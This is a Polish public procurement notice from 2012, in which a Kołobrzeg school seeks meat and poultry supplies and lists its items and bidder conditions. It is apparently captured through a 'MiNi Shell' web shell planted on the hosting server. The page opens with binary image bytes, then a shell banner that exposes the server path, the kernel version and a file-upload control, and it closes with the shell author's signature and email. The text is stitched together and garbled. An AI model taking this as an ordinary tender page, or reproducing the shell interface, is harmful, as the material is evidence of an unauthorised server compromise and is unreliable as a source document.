JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/491626-N-2012.html

<p class="kh_header"><b>Kołobrzeg: dot.: postępowania o udzielenie zamówienia publicznego. Numer sprawy: DA.323/4/2012. 
Nazwa zadania: Dostawa artykułów spożywczych w grupie:
 1)Produkty zwierzęce, mięso i produkty mięsne - kod CPV 15100000-9
 2)Produkty drobiowe - kod CPV 15131500-0</b><br>
<b>Numer ogłoszenia: 491626 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ekonomiczno-Hotelarskich im. Emilii Gierczak , ul. Łopuskiego 13, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 0-94 35 115 55, faks 0-94 35 115 55.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dot.: postępowania o udzielenie zamówienia publicznego. Numer sprawy: DA.323/4/2012. 
Nazwa zadania: Dostawa artykułów spożywczych w grupie:
 1)Produkty zwierzęce, mięso i produkty mięsne - kod CPV 15100000-9
 2)Produkty drobiowe - kod CPV 15131500-0.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zestawienie asortymentowo ilościowe w Exel znajduje się na stronie www.ekonom.kolobrzeg.pl w zakładce przetargi.
							Załącznik Nr 1 a	
	Zestawienie ilościowo-wartościowe w grupie  - MIĘSO I WĘDLINY 							
								
L.P.	           Nazwa  towaru	nazwa handlowa produktu	   J.m.	  Ilość    	    Cena	 Wartość	    Vat	    Wartość
					jedn.	    netto	     %	      brutto
					netto			
	GRUPA G1- mięsa świeże							
								
1	Łopatka z.k bez skóry, tłuszczu,golonki		kg	20		0,00	1,05	0,00
2	Łopatka b.k bez skóry,tłuszczu,golonki		kg	700		0,00	1,05	0,00
3	Karkówka z.k		kg	20		0,00	1,05	0,00
4	Karkówka b.k		kg	400		0,00	1,05	0,00
5	Schab z.k		kg	20		0,00	1,05	0,00
6	Schab b.k		kg	700		0,00	1,05	0,00
7	Wołowina b.k extra zrazowa		kg	200		0,00	1,05	0,00
8	Wołowina pieczeniowa b.k		kg	10		0,00	1,05	0,00
9	Polędwica wołowa		kg	5		0,00	1,05	0,00
10	Żeberka wieprzowe extra		kg	100		0,00	1,05	0,00
11	Golonka wieprzowa przednia lub tylna		kg	100		0,00	1,05	0,00
12	Kości wieprzowe 		kg	200		0,00	1,05	0,00
13	Słonina 		kg	25		0,00	1,05	0,00
14	Słonina mielona		kg	25		0,00	1,05	0,00
15	Ozory wieprzowe		kg	5		0,00	1,05	0,00
16	Smalec luz		kg	5		0,00	1,05	0,00
17	Szynka świeża b.k		kg	20		0,00	1,05	0,00
18	Boczek świeży 		kg	10		0,00	1,05	0,00
19	Polędwiczki wieprzowe		kg	5		0,00	1,05	0,00
								
	Grupa G2 - mięsa mrożone							
								
20	Łopatka z.k bez skóry, tłuszczu, golonki		kg	20		0,00	1,05	0,00
21	Łopatka b.k bez skóry, tłuszczu, golonki		kg	700		0,00	1,05	0,00
22	Karkówka z.k		kg	20		0,00	1,05	0,00
23	Karkówka b.k		kg	400		0,00	1,05	0,00
24	Schab z.k		kg	20		0,00	1,05	0,00
25	Schab b.k		kg	700		0,00	1,05	0,00
26	Wołowina b.k extra		kg	200		0,00	1,05	0,00
27	Wołowina pieczeniowa b.k		kg	10		0,00	1,05	0,00
28	Polędwica wołowa		kg	2		0,00	1,05	0,00
29	Polędwiczki wieprzowe		kg	20		0,00	1,05	0,00
30	Golonka  wieprzowa przednia lub tylna		kg	5		0,00	1,05	0,00
31	Kości wieprzowe 		kg	10		0,00	1,05	0,00
32	Szynka b.k		kg	250		0,00	1,05	0,00
33	Żeberka wieprzowe		kg	10		0,00	1,05	0,00
34	Ozorki mrożone		kg	5		0,00	1,05	0,00
						0,00		0,00
	GRUPA G3 - przetwory					0,00		0,00
						0,00		0,00
35	Ogonówka 		kg	50		0,00	1,08	0,00
36	Boczek wędzony		kg	150		0,00	1,08	0,00
37	Boczek wędzony na zimno		kg	20		0,00	1,08	0,00
38	Szynka krucha lub równoważne		kg	30		0,00	1,08	0,00
39	Szynka wieprzowa gotowana 		kg	350		0,00	1,08	0,00
40	Szynka wędzona lub równoważne		kg	30		0,00	1,08	0,00
41	Szynka cygańska lub równoważne		kg	30		0,00	1,08	0,00
42	Szynka po wiejsku lub równoważne		kg	30		0,00	1,08	0,00
43	Szynka delikatesowa lub równoważne		kg	30		0,00	1,08	0,00
44	Szynka -plaster miodu lub równoważne		kg	30		0,00	1,08	0,00
45	Szynka biała lub równoważne		kg	20		0,00	1,08	0,00
46	Wędzonka lub równoważne		kg	20		0,00	1,08	0,00
47	Baleron gotowany 		kg	20		0,00	1,08	0,00
48	Baleron domowy lub równoważne		kg	15		0,00	1,08	0,00
49	Baleron pieczony 		kg	15		0,00	1,08	0,00
50	Polędwica sopocka		kg	300		0,00	1,08	0,00
51	Polędwica wędzona		kg	10		0,00	1,08	0,00
52	Polędwica z komina lub równoważne		kg	30		0,00	1,08	0,00
53	Polędwica myśliwska lub równoważne		kg	10		0,00	1,08	0,00
54	Szynka kołobrzeska lub równoważne		kg	20		0,00	1,08	0,00
55	Szynka konserwowa prasowana		kg	20		0,00	1,08	0,00
56	Szynka tostowa prasowana 		kg	10		0,00	1,08	0,00
57	Blok mielony 		kg	20		0,00	1,08	0,00
58	Blok szynkowy prasowany		kg	15		0,00	1,08	0,00
59	Szynka mielona prasowana 		kg	15		0,00	1,08	0,00
60	Szynka wieprzowa z koperkiem 		kg	10		0,00	1,08	0,00
61	Szynka w galarecie 		kg	5		0,00	1,08	0,00
62	Szynka wieprzowa z łopatki prasowana konserwowa 		kg	10		0,00	1,08	0,00
63	Golonka wieprzowa prasowana konserwowa		kg	5		0,00	1,08	0,00
64	Mielonka konserwowa		kg	20		0,00	1,08	0,00
65	Baton szynkowy 		kg	5		0,00	1,08	0,00
66	Rolada z boczku		kg	10		0,00	1,08	0,00
67	Boczek faszerowany 		kg	5		0,00	1,08	0,00
68	Boczek pieczony		kg	10		0,00	1,08	0,00
69	Schab b.k pieczony 		kg	20		0,00	1,08	0,00
70	Łopatka b.k pieczona 		kg	10		0,00	1,08	0,00
71	Kabanosy wieprzowe 		kg	30		0,00	1,08	0,00
72	Kiełbasa krakowska podsuszana 		kg	30		0,00	1,08	0,00
73	Kiełbasa krakowska parzona 		kg	30		0,00	1,08	0,00
74	Kiełbasa wiejska lub równoważne		kg	10		0,00	1,08	0,00
75	Kiełbasa staropolska lub równoważne		kg	10		0,00	1,08	0,00
76	Kiełbasa żywiecka lub równoważne		kg	20		0,00	1,08	0,00
77	Kiełbasa piwna lub równoważne		kg	20		0,00	1,08	0,00
78	Kiełbasa podwawelska lub równoważne		kg	100		0,00	1,08	0,00
79	Salami winne lub równoważne		kg	5		0,00	1,08	0,00
80	Salami piastowska lub równoważne		kg	5		0,00	1,08	0,00
81	Salami parzone lub równoważne		kg	10		0,00	1,08	0,00
82	Salami wyborna lub równoważne		kg	40		0,00	1,08	0,00
83	Salami z czosnkiem		kg	5		0,00	1,08	0,00
84	Salami z papryką		kg	5		0,00	1,08	0,00
85	Salami codzienna lub równoważne		kg	5		0,00	1,08	0,00
86	Parówka marynarska extra lub równoważne		kg	150		0,00	1,08	0,00
87	Parówka domowa lub równoważne		kg	100		0,00	1,08	0,00
88	Parówka firmowa lub równoważne		kg	100		0,00	1,08	0,00
89	Serdelki wiedeńskie lub równoważne		kg	100		0,00	1,08	0,00
90	Metka cebulowa lub równoważne		kg	2		0,00	1,08	0,00
91	Metka łososiowa lub równoważne		kg	2		0,00	1,08	0,00
92	Flaki wołowe w rosole		kg	5		0,00	1,08	0,00
93	Flaki wołowe krojone		kg	10		0,00	1,08	0,00
94	Kiełbasa biała surowa		kg	10		0,00	1,08	0,00
95	Kiełbasa biała parzona		kg	50		0,00	1,08	0,00
96	Kiełbasa biała gotowana		kg	10		0,00	1,08	0,00
97	Kiełbasa toruńska lub równoważne		kg	20		0,00	1,08	0,00
98	Kiełbasa jarmarczna lub równoważne		kg	40		0,00	1,08	0,00
99	Kiełbasa śląska domowa 		kg	150		0,00	1,08	0,00
100	Mortadela 		kg	2		0,00	1,08	0,00
101	Żywiecka kanapkowa lub równoważne		kg	2		0,00	1,08	0,00
102	Szynkowa wieprzowa lub równoważne		kg	10		0,00	1,08	0,00
103	Kiełbasa  rawska lub równoważne		kg	10		0,00	1,08	0,00
104	Kaszanka 		kg	20		0,00	1,08	0,00
105	Krupniok 		kg	5		0,00	1,08	0,00
106	Kiszka ziemniaczana lub równoważne		kg	5		0,00	1,08	0,00
107	Pasztetowa 		kg	10		0,00	1,08	0,00
108	Salceson włoski 		kg	30		0,00	1,08	0,00
109	Salceson ozorkowy 		kg	15		0,00	1,08	0,00
110	Salceson domowy lub równoważne		kg	15		0,00	1,08	0,00
111	Pasztet staropolski lub równoważne		kg	70		0,00	1,08	0,00
112	Pasztet zapiekany 		kg	70		0,00	1,08	0,00
113	Pieczeń domowa lub równoważne		kg	5		0,00	1,08	0,00
114	Pieczeń rzymska lub równoważne		kg	30		0,00	1,08	0,00
115	Pieczeń staropolska lub równoważne		kg	5		0,00	1,08	0,00
116	Pieczeń firmowa lub równoważne 		kg	5		0,00	1,08	0,00
117	Udziec wieprzowy pieczony z kością i skórą		kg	10		0,00	1,08	0,00
118	Prosię pieczone z farszem		szt	1		0,00	1,08	0,00
	Wartość razem					0,00		0
	--------------------------------------------------------------------------------
							
Zestawienie - DRÓB 2013r.				Załącznik nr 1 b			
							
          Nazwa  towaru	nazwa handlowa produktu	  J.m.	  Ilość	     Cena	  Wartość	    Vat	     Wartość
				    jednost.	    netto	     %	       brutto
				      netto			
Grupa G1 - mięsa świeże							
							
Kurczak 		kg	200		0,00 zł	1,05	0
Udka z kurczaka 		kg	700		0,00 zł	1,05	0
Filet drobiowy 		kg	1000		0,00 zł	1,05	0
Porcja rosołowa 		kg	200		0,00 zł	1,05	0
Wątroba z kurczaka		kg	70		0,00 zł	1,05	0
Filet z indyka 		kg	400		0,00 zł	1,05	0
Żołądki z kurczaka 		kg	10		0,00 zł	1,05	0
Kaczka 		kg	5		0,00 zł	1,05	0
Indyk 		kg	10		0,00 zł	1,05	0
Udziec z indyka 		kg	10		0,00 zł	1,05	0
Udka z kaczki		kg	10		0,00 zł	1,05	0
					0,00 zł	1,05	0
Grupa G 2 - mięsa  mrożone					0,00 zł	1,05	0
					0,00 zł	1,05	0
Kurczak 		kg	50		0,00 zł	1,05	0
Udka z kurczaka 		kg	100		0,00 zł	1,05	0
Filet drobiowy		kg	200		0,00 zł	1,05	0
Porcja rosołowa 		kg	20		0,00 zł	1,05	0
Wątroba z kurczaka  		kg	10		0,00 zł	1,05	0
Filet z indyka 		kg	10		0,00 zł	1,05	0
Żołądki z kurczaka 		kg	10		0,00 zł	1,05	0
Kaczka 		kg	10		0,00 zł	1,05	0
Udka z kaczki		kg	10		0,00 zł	1,05	0
Indyk 		kg	10		0,00 zł	1,05	0
					0,00 zł		0
Grupa G 3 - przetwory					0,00 zł		0
					0,00 zł		0
Kurczak wędzony 		kg	35		0,00 zł	1,08	0
Udko z kurczaka wędzone		kg	5		0,00 zł	1,08	0
Kiełbasa drobiowa żywiecka 		kg	5		0,00 zł	1,08	0
Kiełbasa drobiowa krakowska 		kg	5		0,00 zł	1,08	0
Baleron z indyka 		kg	5		0,00 zł	1,08	0
Baleron z drobiu 		kg	5		0,00 zł	1,08	0
Kurczak faszerowany 		kg	5		0,00 zł	1,08	0
Indyk w galarecie		kg	5		0,00 zł	1,08	0
Kabanosy drobiowe		kg	5		0,00 zł	1,08	0
Szynka mozaika z indyka 		kg	5		0,00 zł	1,08	0
Polędwica drobiowa		kg	80		0,00 zł	1,08	0
Rolada z drobiu 		kg	5		0,00 zł	1,08	0
Szynka drobiowa 		kg	5		0,00 zł	1,08	0
Filet wędzony pieczony		kg	5		0,00 zł	1,08	0
Parówki drobiowe		kg	5		0,00 zł	1,08	0
Kiełbasa parówkowa		kg	5		0,00 zł	1,08	0
Pasztet drobiowy		kg	5		0,00 zł	1,08	0
Pieczeń drobiowa 		kg	5		0,00 zł	1,08	0
Polędwica z indyka wędzona		kg	5		0,00 zł	1,08	0
Salceson drobiowy		kg	5		0,00 zł	1,08	0
Polędwica sopocka z indyka 		kg	5		0,00 zł	1,08	0
Salceson z indyka		kg	5		0,00 zł	1,08	0
Szynka pieczona z indyka 		kg	5		0,00 zł	1,08	0
Szynkówka z indyka 		kg	5		0,00 zł	1,08	0
Kiełbasa biała drobiowa		kg	5		0,00 zł	1,08	0
							
					0,00 zł		0.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 20%</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.15.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania Certyfikatu lub zaświadczenie potwierdzające wprowadzenie systemu bezpieczeństwa żywnościowego HACCP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,                                                                                                                   Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania Certyfikatu lub zaświadczenie potwierdzające wprowadzenie systemu bezpieczeństwa żywnościowego HACCP.           
2)	 posiadania wiedzy i doświadczenia,
 [ ]  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
 [ ]  Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 dostaw okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - wykaz wykonywanych dostaw

                                                                                                                                                                                       

3)	 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>).Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego  potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ekonom.kolobrezg.pl (zakładka -przetargi + link z BIP); zsehkolobrzeg.finn.pl (zakładka przetarg<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul.Łopuskiego 13 pok. 114, 78-100 Kołobrzeg, tel 943511556.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2012 godzina 09:30, miejsce: ul.Łopuskiego 13 pok. 114, 78-100 Kołobrzeg, tel 943511556.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com